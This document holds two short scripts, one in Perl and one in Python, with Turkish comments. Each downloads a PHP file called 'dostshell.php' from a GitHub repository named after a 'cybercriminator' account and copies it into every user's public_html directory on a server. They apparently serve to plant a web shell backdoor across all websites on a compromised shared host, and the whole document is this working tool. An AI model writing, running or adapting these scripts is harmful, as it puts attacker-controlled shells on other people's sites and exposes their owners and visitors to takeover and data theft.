File: backtir.pl
use strict;
use warnings;
use LWP::Simple;
use File::Copy;
use File::Glob ':glob';

# Dosya URL'si
my $url = 'https://raw.githubusercontent.com/cybercriminator/BaBa/master/dostshell.php';
# Geçici dosya konumu
my $temp_file = '/home/dostshell.php';

# Dosyayı URL'den indir
print "Dosya indiriliyor...\n";
my $status = getstore($url, $temp_file);

if (is_success($status)) {
    print "$url dosyası indirildi -> $temp_file\n";
} else {
    die "Dosya indirilemedi, hata kodu: $status\n";
}

# Hedef dizinlere kopyala
foreach my $target_dir (bsd_glob('/home/*/public_html/')) {
    if (-d $target_dir) {  # Dizin mevcutsa
        eval {
            copy($temp_file, $target_dir) or die "Kopyalama başarısız: $!";
            print "$temp_file kopyalandı -> $target_dir\n";
        };
        if ($@) {
            print "Hata: $target_dir içine kopyalanamadı. $@\n";
        }
    }
}

# Geçici dosyayı sil
unlink $temp_file or warn "$temp_file silinemedi: $!\n";

File: backtir.py
import requests
import glob
import shutil

# Dosya URL'si
url = 'https://raw.githubusercontent.com/cybercriminator/BaBa/master/dostshell.php'
# Geçici dosya konumu
temp_file = '/home/dostshell.php'

# Dosyayı URL'den indir
try:
    response = requests.get(url)
    if response.status_code == 200:
        with open(temp_file, 'wb') as file:
            file.write(response.content)
        print(f"{url} dosyası indirildi -> {temp_file}")
    else:
        print(f"Dosya indirilemedi, hata kodu: {response.status_code}")
except Exception as e:
    print(f"Dosya indirilemedi: {e}")
    exit()

# Hedef dizinlere kopyala
for target_dir in glob.glob('/home/*/public_html/'):
    try:
        shutil.copy(temp_file, target_dir)
        print(f"{temp_file} kopyalandı -> {target_dir}")
    except Exception as e:
        print(f"Hata: {target_dir} içine kopyalanamadı. {e}")
